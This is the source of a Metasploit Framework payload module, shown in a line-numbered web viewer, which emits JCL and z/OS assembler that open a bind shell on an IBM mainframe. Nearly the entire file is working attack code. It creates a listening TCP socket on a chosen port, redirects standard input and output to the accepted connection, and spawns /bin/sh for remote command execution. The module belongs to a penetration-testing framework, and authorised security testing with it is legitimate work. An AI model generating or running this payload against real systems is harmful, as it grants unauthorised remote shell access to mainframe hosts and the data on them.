Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
# This payload has no ebcdic<->ascii translator built in.

5
# Therefore it must use a shell which does, like mainframe_shell

6
#

7
# this payload will spawn a bind shell from z/os, when submitted

8
#  on the system as JCL to JES2

9
##

10


11
module MetasploitModule

12
  CachedSize = 10712

13
  include Msf::Payload::Single

14
  include Msf::Payload::Mainframe

15
  include Msf::Sessions::CommandShellOptions

16


17
  def initialize(info = {})

18
    super(

19
      merge_info(

20
        info,

21
        'Name' => 'Z/OS (MVS) Command Shell, Bind TCP',

22
        'Description' => %q{

23
          Provide JCL which creates a bind shell

24
          This implementation does not include ebcdic character translation,

25
          so a client with translation capabilities is required.  MSF handles

26
          this automatically.

27
        },

28
        'Author' => 'Bigendian Smalls',

29
        'License' => MSF_LICENSE,

30
        'Platform' => 'mainframe',

31
        'Arch' => ARCH_CMD,

32
        'Handler' => Msf::Handler::BindTcp,

33
        'Session' => Msf::Sessions::MainframeShell,

34
        'PayloadType' => 'cmd',

35
        'RequiredCmd' => 'jcl',

36
        'Payload' => {

37
          'Offsets' => {},

38
          'Payload' => ''

39
        }

40
      )

41
    )

42
    register_options(

43
      [

44
        # need these defaulted so we can manipulate them in command_string

45
        Opt::LHOST('0.0.0.0'),

46
        Opt::LPORT(32700),

47
        OptString.new('ACTNUM', [true, 'Accounting info for JCL JOB card', 'MSFUSER-ACCTING-INFO']),

48
        OptString.new('PGMNAME', [true, 'Programmer name for JCL JOB card', 'programmer name']),

49
        OptString.new('JCLASS', [true, 'Job Class for JCL JOB card', 'A']),

50
        OptString.new('NOTIFY', [false, 'Notify User for JCL JOB card', '']),

51
        OptString.new('MSGCLASS', [true, 'Message Class for JCL JOB card', 'Z']),

52
        OptString.new('MSGLEVEL', [true, 'Message Level for JCL JOB card', '(0,0)'])

53
      ], self.class

54
    )

55
    register_advanced_options(

56
      [

57
        OptBool.new('NTFYUSR', [true, 'Include NOTIFY Parm?', false]),

58
        OptString.new('JOBNAME', [true, 'Job name for JCL JOB card', 'DUMMY'])

59
      ],

60
      self.class

61
    )

62
  end

63


64
  ##

65
  # Construct Payload

66
  ##

67
  def generate(_opts = {})

68
    super + command_string

69
  end

70


71
  ##

72
  # Setup replacement vars and populate payload

73
  ##

74
  def command_string

75
    if (datastore['JOBNAME'] == 'DUMMY') && !datastore['FTPUSER'].nil?

76
      datastore['JOBNAME'] = (datastore['FTPUSER'] + '1').strip.upcase

77
    end

78
    lhost = Rex::Socket.resolv_nbo(datastore['LHOST'])

79
    lhost = lhost.unpack('H*')[0]

80
    lport = datastore['LPORT']

81
    lport = lport.to_s.to_i.to_s(16).rjust(4, '0')

82


83
    jcl_jobcard +

84
      "//**************************************/\n" \

85
      "//*  SPAWN BIND SHELL FOR MSF MODULE   */\n" \

86
      "//**************************************/\n" \

87
      "//*\n" \

88
      "//STEP1      EXEC PROC=ASMACLG,PARM.L=(CALL)\n" \

89
      "//L.SYSLIB   DD  DSN=SYS1.CSSLIB,DISP=SHR\n" \

90
      "//C.SYSIN    DD  *,DLM=ZZ\n" \

91
      "         TITLE  'Spawns Bind Shell'\n" \

92
      "SPAWNBND CSECT\n" \

93
      "SPAWNBND AMODE 31\n" \

94
      "SPAWNBND RMODE ANY\n" \

95
      "***********************************************************************\n" \

96
      "*        @SETUP registers and save areas                              *\n" \

97
      "***********************************************************************\n" \

98
      "         USING *,15\n" \

99
      "@SETUP0  B     @SETUP1\n" \

100
      "         DROP  15\n" \

101
      "         DS    0H                 # half word boundary\n" \

102
      "@SETUP1  STM   14,12,12(13)       # save our registers\n" \

103
      "         LR    2,13               # callers sa\n" \

104
      "         LR    8,15               # pgm base in R8\n" \

105
      "         USING @SETUP0,8          # R8 for base addressability\n" \

106
      "*************************************\n" \

107
      "* set up data area / addressability *\n" \

108
      "*************************************\n" \

109
      "         L     0,@DYNSIZE         # len of variable area\n" \

110
      "         GETMAIN RU,LV=(0)        # get data stg, len R0\n" \

111
      "         LR    13,1               # data address\n" \

112
      "         USING @DATA,13           # addressability for data area\n" \

113
      "         ST    2,@BACK            # store callers sa address\n" \

114
      "         ST    13,8(,2)           # store our data addr\n" \

115
      "         DS    0H                 # halfword boundaries\n" \

116
      "\n" \

117
      "***********************************************************************\n" \

118
      "*        BPX1SOC set up socket - inline                               *\n" \

119
      "***********************************************************************\n" \

120
      "         CALL  BPX1SOC,                                                X\n" \

121
      "               (DOM,TYPE,PROTO,DIM,SRVFD,                              X\n" \

122
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

123
      "*******************************\n" \

124
      "*  chk return code, 0 or exit *\n" \

125
      "*******************************\n" \

126
      "         LHI   15,2\n" \

127
      "         L     6,RTN_VAL\n" \

128
      "         CIB   6,0,7,EXITP        # R6 not 0? Time to exit\n" \

129
      "\n" \

130
      "***********************************************************************\n" \

131
      "*        BPX1BND (bind) bind to local socket - inline                 *\n" \

132
      "***********************************************************************\n" \

133
      "         XC    SOCKADDR(16),SOCKADDR        # zero sock addr struct\n" \

134
      "         MVI   SOCK_FAMILY,AF_INET          # family inet\n" \

135
      "         MVI   SOCK_LEN,SOCK#LEN            # len of socket\n" \

136
      "         MVC   SOCK_SIN_PORT,CONNSOCK       # port to bind to\n" \

137
      "         MVC   SOCK_SIN_ADDR,CONNADDR       # address to bind to\n" \

138
      "         CALL  BPX1BND,                                                X\n" \

139
      "               (SRVFD,SOCKLEN,SOCKADDR,                                X\n" \

140
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

141
      "*******************************\n" \

142
      "*  chk return code, 0 or exit *\n" \

143
      "*******************************\n" \

144
      "         LHI   15,3\n" \

145
      "         L     6,RTN_VAL\n" \

146
      "         CIB   6,0,7,EXITP        # R6 not 0? Time to exit\n" \

147
      "\n" \

148
      "***********************************************************************\n" \

149
      "*        BPX1LSN (listen) listen on local socket - inline             *\n" \

150
      "***********************************************************************\n" \

151
      "         CALL  BPX1LSN,                                                X\n" \

152
      "               (SRVFD,BACKLOG,                                         X\n" \

153
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

154
      "*******************************\n" \

155
      "*  chk return code, 0 or exit *\n" \

156
      "*******************************\n" \

157
      "         LHI   15,4\n" \

158
      "         L     6,RTN_VAL\n" \

159
      "         CIB   6,0,7,EXITP        # R6 not 0? Time to exit\n" \

160
      "\n" \

161
      "***********************************************************************\n" \

162
      "*        BPX1ACP (accept) accept socket connection - inline           *\n" \

163
      "***********************************************************************\n" \

164
      "         XC    SOCKADDR(16),SOCKADDR        # zero sock addr struct\n" \

165
      "         MVI   SOCK_FAMILY,AF_INET          # family inet\n" \

166
      "         MVI   SOCK_LEN,SOCK#LEN            # len of socket\n" \

167
      "         CALL  BPX1ACP,                                                X\n" \

168
      "               (SRVFD,CLILEN,CLISKT,                                   X\n" \

169
      "               CLIFD,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

170
      "*******************************\n" \

171
      "*  chk return code, 0 or exit *\n" \

172
      "*******************************\n" \

173
      "         LHI   15,5\n" \

174
      "         L     6,RTN_VAL\n" \

175
      "         CIB   6,0,7,EXITP        # R6 not 0? Time to exit\n" \

176
      "\n" \

177
      "*************************************************\n" \

178
      "* order of things to prep child pid             *\n" \

179
      "*  0) Dupe all 3 file desc of CLIFD             *\n" \

180
      "*  1) Dupe parent read fd to std input          *\n" \

181
      "*************************************************\n" \

182
      "*******************\n" \

183
      "*****  STDIN  *****\n" \

184
      "*******************\n" \

185
      "         CALL  BPX1FCT,                                                X\n" \

186
      "               (CLIFD,                                                 X\n" \

187
      "               =A(F_DUPFD2),                                           X\n" \

188
      "               =A(F_STDI),                                             X\n" \

189
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

190
      "****************************************************\n" \

191
      "*  chk return code here anything but -1 is ok      *\n" \

192
      "****************************************************\n" \

193
      "         LHI   15,6               # exit code for this func\n" \

194
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

195
      "         CIB   7,-1,8,EXITP       # r6 = -1 exit\n" \

196
      "\n" \

197
      "*******************\n" \

198
      "*****  STDOUT *****\n" \

199
      "*******************\n" \

200
      "         CALL  BPX1FCT,                                                X\n" \

201
      "               (CLIFD,                                                 X\n" \

202
      "               =A(F_DUPFD2),                                           X\n" \

203
      "               =A(F_STDO),                                             X\n" \

204
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

205
      "****************************************************\n" \

206
      "*  chk return code here anything but -1 is ok      *\n" \

207
      "****************************************************\n" \

208
      "         LHI   15,7               # exit code for this func\n" \

209
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

210
      "         CIB   7,-1,8,EXITP       # r6 = -1 exit\n" \

211
      "\n" \

212
      "*******************\n" \

213
      "*****  STDERR *****\n" \

214
      "*******************\n" \

215
      "         CALL  BPX1FCT,                                                X\n" \

216
      "               (CLIFD,                                                 X\n" \

217
      "               =A(F_DUPFD2),                                           X\n" \

218
      "               =A(F_STDE),                                             X\n" \

219
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

220
      "****************************************************\n" \

221
      "*  chk return code here anything but -1 is ok      *\n" \

222
      "****************************************************\n" \

223
      "         LHI   15,8               # exit code for this func\n" \

224
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

225
      "         CIB   7,-1,8,EXITP       # r7 = -1 exit\n" \

226
      "\n" \

227
      "***********************************************************************\n" \

228
      "*        BP1SPN (SPAWN) execute shell '/bin/sh'                       *\n" \

229
      "***********************************************************************\n" \

230
      "         XC    INHE(INHE#LENGTH),INHE   # clear inhe structure\n" \

231
      "         XI    INHEFLAGS0,INHESETPGROUP\n" \

232
      "         SPACE ,\n" \

233
      "         MVC   INHEEYE,=C'INHE'\n" \

234
      "         LH    0,TLEN\n" \

235
      "         STH   0,INHELENGTH\n" \

236
      "         LH    0,TVER\n" \

237
      "         STH   0,INHEVERSION\n" \

238
      "         CALL  BPX1SPN,                                                X\n" \

239
      "               (EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL,EXENVC,EXENVLL,     X\n" \

240
      "               EXENVL,FDCNT,FDLST,=A(INHE#LENGTH),INHE,RTN_VAL,        X\n" \

241
      "               RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

242
      "         LHI   15,9               # exit code for this func\n" \

243
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

244
      "         L     6,RTN_COD\n" \

245
      "         L     5,RSN_COD\n" \

246
      "         CIB   7,-1,8,EXITP       # r7 = -1 exit\n" \

247
      "\n" \

248
      "****************************************************\n" \

249
      "* cleanup & exit preload R15 with exit code        *\n" \

250
      "****************************************************\n" \

251
      "         XR    15,15              # 4 FOR rc\n" \

252
      "EXITP    L     0,@DYNSIZE\n" \

253
      "         LR    1,13\n" \

254
      "         L     13,@BACK\n" \

255
      "         DROP  13\n" \

256
      "         FREEMAIN RU,LV=(0),A=(1) #free storage\n" \

257
      "         XR    15,15\n" \

258
      "         L     14,12(,13)         # load R14\n" \

259
      "         LM    0,12,20(13)        # load 0-12\n" \

260
      "         BSM   0,14               # branch to caller\n" \

261
      "\n" \

262
      "****************************************************\n" \

263
      "* Constants and Variables                          *\n" \

264
      "****************************************************\n" \

265
      "         DS    0F                 # constants full word boundary\n" \

266
      "F_STDI   EQU   0\n" \

267
      "F_STDO   EQU   1\n" \

268
      "F_STDE   EQU   2\n" \

269
      "*************************\n" \

270
      "* Socket conn variables *         # functions used by pgm\n" \

271
      "*************************\n" \

272
      "CONNSOCK DC    XL2'#{lport}'      # LPORT\n" \

273
      "CONNADDR DC    XL4'#{lhost}'      # LHOST\n" \

274
      "BACKLOG  DC    F'1'               # 1 byte backlog\n" \

275
      "DOM      DC    A(AF_INET)         # AF_INET = 2\n" \

276
      "TYPE     DC    A(SOCK#_STREAM)    # stream = 1\n" \

277
      "PROTO    DC    A(IPPROTO_IP)      # ip = 0\n" \

278
      "DIM      DC    A(SOCK#DIM_SOCKET) # dim_sock = 1\n" \

279
      "SOCKLEN  DC    A(SOCK#LEN+SOCK_SIN#LEN)\n" \

280
      "CLILEN   DC    F'0'               # client sock len - don't care\n" \

281
      "CLISKT   DC    X'00'              # client socket struck - don't care\n" \

282
      "************************\n" \

283
      "* BPX1SPN vars *********\n" \

284
      "************************\n" \

285
      "EXCMD    DC    CL7'/bin/sh'       # command to exec\n" \

286
      "EXCMDL   DC    A(L'EXCMD)         # len of cmd to exec\n" \

287
      "EXARGC   DC    F'1'               # num of arguments\n" \

288
      "EXARG1   DC    CL2'sh'            # arg 1 to exec\n" \

289
      "EXARG1L  DC    A(L'EXARG1)        # len of arg1\n" \

290
      "EXARGL   DC    A(EXARG1)          # addr of argument list\n" \

291
      "EXARGLL  DC    A(EXARG1L)         # addr of arg len list\n" \

292
      "EXENVC   DC    F'0'               # env var count\n" \

293
      "EXENVL   DC    F'0'               # env var arg list addr\n" \

294
      "EXENVLL  DC    F'0'               # env var arg len addr\n" \

295
      "FDCNT    DC    F'0'               # field count s/b 0\n" \

296
      "FDLST    DC    F'0'               # field list addr s/b 0\n" \

297
      "TVER     DC    AL2(INHE#VER)\n" \

298
      "TLEN     DC    AL2(INHE#LENGTH)\n" \

299
      "         SPACE ,\n" \

300
      "@DYNSIZE DC    A(@ENDYN-@DATA)\n" \

301
      "***************************\n" \

302
      "***** end of constants ****\n" \

303
      "***************************\n" \

304
      "@DATA    DSECT ,\n" \

305
      "         DS    0D\n" \

306
      "PLIST    DS    16A\n" \

307
      "RTN_VAL  DS    F                  # return value\n" \

308
      "RTN_COD  DS    F                  # return code\n" \

309
      "RSN_COD  DS    F                  # reason code\n" \

310
      "CLIFD    DS    F                  # client fd\n" \

311
      "SRVFD    DS    F                  # server fd\n" \

312
      "@BACK    DS    A\n" \

313
      "*\n" \

314
      "         BPXYSOCK   LIST=NO,DSECT=NO\n" \

315
      "         BPXYFCTL   LIST=NO,DSECT=NO\n" \

316
      "         BPXYINHE   LIST=NO,DSECT=NO\n" \

317
      "@ENDYN   EQU   *\n" \

318
      "@DATA#LEN EQU  *-@DATA\n" \

319
      "         BPXYCONS   LIST=YES\n" \

320
      "         END   SPAWNBND\n" \

321
      "ZZ\n" \

322
      "//*\n"

323
  end

324
end

325


326